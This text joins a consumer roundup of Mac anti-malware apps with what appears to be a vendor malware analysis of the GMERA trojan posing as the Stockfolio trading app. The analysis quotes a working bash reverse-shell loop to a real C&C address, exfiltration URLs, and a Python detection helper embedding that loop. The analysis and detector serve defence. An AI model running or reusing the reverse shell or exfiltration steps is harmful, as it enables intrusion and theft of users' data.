Mac Anti Malware App


There is a popular opinion that Mac systems are inherently more secure than Windows. In fact, most Mac users don’t even bother to use antivirus or anti-malware software. Objectively speaking, that opinion may or may not be true, mainly because it depends on a variety of factors like the number of Mac users, how they use their system, how computer literate they are, etc. However, over the past few years, the threats to Mac users have been increasing, thanks to quickly spreading malware, ransomware, and adware.


Read: Best Malware Removal Tools For Windows


Avoid MacKeeper

I bet you might have seen ads on websites (mostly porn sites) telling you to clean your Mac with MacKeeper. While it’s legitimate software (as in, not a virus), it’s nonetheless useless and a waste of resources. Also, uninstalling MacKeeper isn’t easy either. So, no matter what you do, avoid MacKeeper at any cost.

Instead, it is essential that you use good anti-malware software so that you are not only safe yourself but also avoid spreading malware, ransomware, and viruses to other users. Here are some of the best anti-malware apps for Mac.

Read: How I Removed Malware From my WordPress Site

Best Anti Malware for Mac

1. Malwarebytes

When it comes to dealing with malware and other nasty stuff like rootkits, there is no software more popular than Malwarebytes. Besides removing malware from a Mac effectively, the best thing about Malwarebytes is that it plays nice with any other antivirus software you have already installed. In fact, most users, including me, use Malwarebytes as a backup scanner and perform weekly scans just to make sure that the system hasn’t been infected and doesn’t contain infected files.

To scan your system, all you have to do is install the application, launch it and hit the scan button. As soon as you hit the button, it does a quick scan for malware, PUPs (potentially unwanted programs), rootkits, adware, spyware, viruses, etc., in both system memory and the hard disk. If it finds any threats, it automatically quarantines them.

For in-depth scanning, select the custom scan option. Do keep in mind that the custom scan can take a couple of hours depending on the amount of data you have on your hard disk.

Download Malwarebytes (free, $40 for pro version)

2. Systweak Anti-Malware

Systweak Anti-Malware is a dedicated malware scanning and removal app for macOS. Just like Malwarebytes, Systweak Anti-Malware scans for malware, rootkits, viruses, and adware in your hard disk and system memory. Once it finds a threat, it automatically quarantines it. If you know that Systweak Anti-Malware quarantined a false positive, you can restore the file or app with a single click. For regular, deep, or custom scans, you can create custom schedules.

If you know a file or folder to be safe, you can add it to the exclude list so that it is skipped during scans, avoiding possible false positives. Of course, Systweak Anti-Malware always runs in the background and protects your Mac from malware and PUPs in real time. Other features of the software include a start-up scan, a memory scan, and a beginner-friendly user interface.

So, if you are unsatisfied with Malwarebytes or looking for a good alternative, you should try Systweak Anti-Malware.

Download Systweak Anti-Malware ($40)

3. Bitdefender


Bitdefender is another popular app to protect your Mac from various threats like malware, viruses, Trojans, adware, spyware, unwanted software, and much more. The best thing about Bitdefender is that, apart from protecting you from regular threats, it actively scans in multiple layers to protect your system from ransomware. Other than that, Bitdefender also keeps an eye on cross-platform threats so that you don’t unintentionally spread malware, viruses, or other infected files to your friends, colleagues or family.

Since Bitdefender always runs in the background, it can block any and all threats in real-time. Of course, Bitdefender also scans your system occasionally. If needed, you can create custom schedules with various configurations and scan settings. Bitdefender also has other features like backup protection, safe files, parental controls, secure shopping protection, etc.

Simply put, if you need a full-fledged software that can do much more than blocking and removing malware then give Bitdefender a try.

Download Bitdefender ($50 – $70 according to the version you choose)

4. Avast

Just like Bitdefender, Avast is not just anti-malware software; it is antivirus software that can scan and protect your system from a wide range of threats. In fact, if you’ve ever searched for antivirus software, you have definitely heard about Avast.

Using Avast, you can regularly scan your system and create your own schedules to better protect it. Along with anti-malware security, Avast can also protect your system from infected emails, unprotected Wi-Fi networks, and ransomware. Other features of the software include real-time protection, detailed security reports, browser protection, the ability to shield you from dangerous downloads and PUPs, etc.

As good as the software is, you should be ready for a slight performance dip while using Avast; at least, that has been my experience. Other than that, Avast is a pretty good and reputed app for protecting a Mac from online and offline threats.

Download Avast (free, $70 for pro version)

5. AVG

AVG is yet another popular software that can protect you from malware, viruses, trojans, adware, and other threats. The good thing about AVG is that you can scan your system for threats related to Mac, Windows, and Android so that you don’t spread viruses or malware to other systems. Also, thanks to the simple and minimal design, using AVG to scan or create scanning schedules is pretty easy and straightforward. Moreover, unlike Avast, AVG always runs in the background and provides real-time protection for free.

As good as it is, when you try to download AVG from the official site, you will be redirected to the CNET website. So, be careful while installing it on your system as CNET has a habit of bundling adware and other toolbars along with the software you are trying to install.

If you are looking for all-around protection with real-time threat analysis and blocking then you should go with AVG.

Download AVG (free)

6. Sophos Home

Another popular option amongst Mac users, Sophos Home is more than just an anti-malware tool. It comes with a bunch of extra features, including live chat support.

Sophos offers anti-virus and ransomware protection along with anti-malware protection. The programme also lets you remotely manage your devices. Yes, ‘devices’: Sophos Home can be used on up to 10 devices with the paid version and 3 devices with the free version. It doesn’t end there: Sophos Home also lets you set up parental controls so that none of your devices reach the unprotected side of the Web.

Download Sophos Home (30 day trial, $27 yearly for premium)

Wrapping Up: Best Anti Malware for Mac

If you are looking for a dedicated anti-malware software that plays well with other antivirus and firewall software then go with Malwarebytes. As a premium option, you can also try Systweak Anti-Malware. If you are looking for a full-fledged anti-virus software that can extend the protection to viruses, adware, ransomware, and other threats then go with AVG as it provides real-time protection for free. You can also try Bitdefender.

In general, if you know what you are doing on the Internet and don’t download cracked software or porn, you probably don’t need anti-virus and/or anti-malware software. That said, if you don’t consider yourself tech savvy, or if you are buying a computer for your parents, it’s a good idea to have an anti-malware app installed.

That’s it for now. If you think I missed any of your favorite anti-malware software, comment below and share it with me. It will also help other Mac users.

Read: Top 10 Free Portable Anti-Malware Software to Have on Your Pen Drive

Cyber Threats


Unlike in the pre-internet era, when trading in the stock or commodities market involved a phone call to a broker, a move which often meant additional fees for would-be traders, the rise of trading apps placed the ability to trade in the hands of ordinary users. However, their popularity has led to their abuse by cybercriminals, who create fake trading apps as lures to steal the personal data of unsuspecting victims. We recently found and analyzed an example of such an app: a malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.

We found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to obtain the key for its encrypted code, while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism.

Sample 1: Trojan.MacOS.GMERA.A

We found the first sample (detected as Trojan.MacOS.GMERA.A) while checking suspicious shell scripts that were flagged by our machine learning system. At first glance, it was challenging to directly identify its malicious behavior because the shell script references other files such as AppCode, .pass and .app. To verify that the behavior was indeed malicious, we sourced the parent file using both our infrastructure and the aggregate website VirusTotal (which had the sample but lacked detections from other major security vendors at the time of writing).

Figure 1. The suspicious shell script which was flagged by our system

The initial sample we analyzed was a zip archive file (detected as Trojan.MacOS.GMERA.A) that contained an app bundle (Stockfoli.app) and a hidden encrypted file (.app). The fake app presents itself as legitimate to trick users, but we found that it contained several malicious components.

Figure 2. Content of the zip file. Note that the app bundle is missing the “o” at the end, whereas the legitimate app is called Stockfolio.

The zip file and its contents

The first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.

Comparing it to the Resources directory of the current version (1.5) found on the Stockfolio website revealed a number of differences, as shown in the figure below.

Figure 3. Comparison of the app bundle folder structure between the malware variant (top) and the legitimate app (version 1.5, bottom).


Technical Analysis

When the app is executed, an actual trading app interface will appear on-screen. However, unbeknownst to the user, the malware variant is already performing its malicious routines in the background.

Figure 4. Interface displayed when the malware app bundle is executed

The main Mach-O executable will launch the following bundled shell scripts in the Resources directory:

  • plugin
  • stock

The plugin and stock shell scripts

The plugin shell script collects the following information from the infected system:

  • username
  • IP address
  • apps in /Applications
  • files in ~/Documents
  • files in ~/Desktop
  • OS installation date
  • file system disk space usage
  • graphic/display information
  • wireless network information
  • screenshots

It then base64-encodes the collected information, saves it in a hidden file, /tmp/.info, and uploads that file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and the machine serial number as identifiers.

If a successful response is returned from the URL, it writes the response to another hidden file, ~/Library/Containers/.pass.

Figure 5. The “plugin” script

The stock shell script copies Stockfoli.app/Contents/Resources/appcode to /private/var/tmp/appcode. It then locates the .app file, which is the hidden file in the zip bundle that comes with Stockfoli.app.

Figure 6. The “stock” script

It decodes the base64-encoded .app file, executes it, then drops the following:

File | Details
/tmp/.hostname | gmzera54l5qpa6lm.onion
/tmp/.privatkey | RSA private key

It will delete the .app file then check if the file ~/Library/Containers/.pass exists. Using the contents of the ‘.pass’ file as the key, the malware variant will decrypt /private/var/tmp/appcode, which is encrypted using AES-256-CBC. It then saves the decrypted file to /tmp/appcode. Finally, it will execute the appcode. If it fails to do so, it will delete the /tmp/appcode file and ~/Library/Containers/.pass. Note that in the sample we analyzed, the decryption routine failed since the sample was not able to create ~/Library/Containers/.pass.

Figure 7. Comparison of the code-signing information of the malicious app (top) and the legitimate Stockfolio app (bottom)


We suspect the file appcode is a malware file that contains additional routines. However, at the time of writing, we were unable to decrypt this file since the upload URL hxxps://appstockfolio.com/panel/upload[.]php was inaccessible (according to VirusTotal, the domain was active from January to February 2019). Furthermore, we suspect that the full malware routine uses the TOR network due to the presence of the unused address gmzera54l5qpa6lm[.]onion.

Sample 2: Trojan.MacOS.GMERA.B

Using the digital certificate of the first sample, we were able to find a second variant (detected as Trojan.MacOS.GMERA.B) that was uploaded to VirusTotal in June 2019. Like the first variant, it contains an embedded copy of Stockfolio.app version 1.4.13 with the malware author’s digital certificate. When executed, it launches the app in a similar manner to disguise its malicious intent.

Figure 8. The bundle structure of Trojan.MacOS.GMERA.B

Once opened, Trojan.MacOS.GMERA.B executes the embedded copy of Stockfolio version 1.4.13, after which it launches the shell script run.sh.

The run.sh script collects the username and IP address of the infected machine via the following commands:

  • username = 'whoami'
  • IP address = 'curl -s ipecho.net/plain'

It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:

  • hxxp://owpqkszz[.]info/link.php?{username}&{ip address}

As part of its routine, the malware also drops the following files:

File | Details
/private/tmp/.com.apple.upd.plist | Copy of ~/Library/LaunchAgents/.com.apple.upd.plist
~/Library/LaunchAgents/.com.apple.upd.plist | Persistence mechanism
/tmp/loglog | Malware execution logs

It then creates a simple reverse shell to the C&C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands.

Figure 9. Content of the run.sh shell script

One of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist

Figure 10. Hidden plist file used for persistence

After we decoded the base64-encoded arguments for the plist file, we found the following code:

  • while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

This loop, launched through the plist file, constantly re-creates the reverse shell mentioned earlier, tearing down the previous session and reconnecting every 10,000 seconds. The simple reverse shell created was observed to use ports 25733-25736.
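As an added example (not code from the report or from the malware), the following Python triage helper inspects a LaunchAgent plist the way a responder would hunt for this persistence mechanism: it decodes long base64 arguments, flags the hidden file name and the /dev/tcp reverse shell, and extracts the C&C address and port. The sample plist is constructed here from the decoded loop shown above; its Label value and the echo-to-base64-to-bash wrapper are assumptions, since the report only shows the decoded arguments.

```python
import base64
import plistlib
import re

# Constructed LaunchAgent modelled on the hidden .com.apple.upd.plist described
# above; the loop is the decoded command from the report, wrapped here (an
# assumption) as one base64 argument that is piped through base64 -D into bash.
LOOP = ("while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; "
        "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done")
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.apple.upd",  # hypothetical label; the report does not show it
    "RunAtLoad": True,
    "ProgramArguments": ["/bin/bash", "-c", "echo "
                         + base64.b64encode(LOOP.encode()).decode()
                         + " | base64 -D | bash"],
})
# Benign agent, constructed as a negative control.
CLEAN_PLIST = plistlib.dumps({"Label": "com.example.clean",
                              "ProgramArguments": ["/usr/bin/true"]})

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DEVTCP_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")

def decode_b64_blobs(text):
    """Return the printable decodings of every long base64 run in text."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            dec = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if dec.isprintable():
            out.append(dec)
    return out

def analyze_launch_agent(name, data):
    """Flag GMERA-style persistence in one LaunchAgent plist (bytes): hidden
    file name, base64-wrapped argument, /dev/tcp reverse shell, detached screen
    session. Returns the findings plus the (ip, port) the shell dials, if any."""
    plist = plistlib.loads(data)
    args = " ".join(plist.get("ProgramArguments", []))
    decoded = " ".join(decode_b64_blobs(args))
    findings, c2 = [], None
    if name.startswith("."):
        findings.append("hidden plist name")
    if decoded:
        findings.append("base64-encoded argument")
    m = DEVTCP_RE.search(args + " " + decoded)
    if m:
        findings.append("/dev/tcp reverse shell")
        c2 = (m.group(1), int(m.group(2)))
    if "screen -d -m" in args + " " + decoded:
        findings.append("detached screen session")
    return {"suspicious": c2 is not None, "findings": findings, "c2": c2}
```

To triage a real host, call analyze_launch_agent on every file in ~/Library/LaunchAgents (and /Library/LaunchAgents), listing dot-prefixed names explicitly since Finder hides them.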

Conclusion

Given the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.

In the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if they come from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize the chances of downloading a malicious one. We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app's developers was revoked in July of this year.

Trend Micro solutions

End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.

Indicators of Compromise (IoCs)

Sample 1

Filename | SHA256 | Detection name
plugin | 6fe741ef057d38dd6d9bbe02dacbcb4940dac6c32e0f50a641e73727d6bf60d9 | Trojan.SH.GMERA.A
stock | 6f48ef0d76ce68bbca53b05d2d22031aec5ce997e7227c3dcb20809959680f11 | Trojan.SH.GMERA.A
Stockfoli | efd5b96f489f934f2465a185e43fddf50fcde51b12a8fb91d5d93b09a21706c7 | Trojan.MacOS.GMERA.A
Trial_Stockfoli.zip | 18e1db7c37a63d987a5448b4dd25103c8053799b0deea5f45f00ca094afe2fe7 | Trojan.MacOS.GMERA.A

Sample 2

Filename | SHA256 | Detection name
com.apple.upd.plist | be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787 | Trojan.MacOS.GMERA.B
run.sh | d50f5e94f2c417623c5f573963cc777c0676cc7245d65967ca09a53f464d2b50 | Trojan.SH.GMERA.B
Stockfoli (sample 2) | 83df2f39140679a9cfb55f9c839ff8e7638ba29dba164900f9c77bb177796e03 | Trojan.MacOS.GMERA.B
Trial_Stockfoli.zip (sample 2) | faa2799751582b8829c61cbfe2cbaf3e792960835884b61046778d17937520f4 | Trojan.MacOS.GMERA.B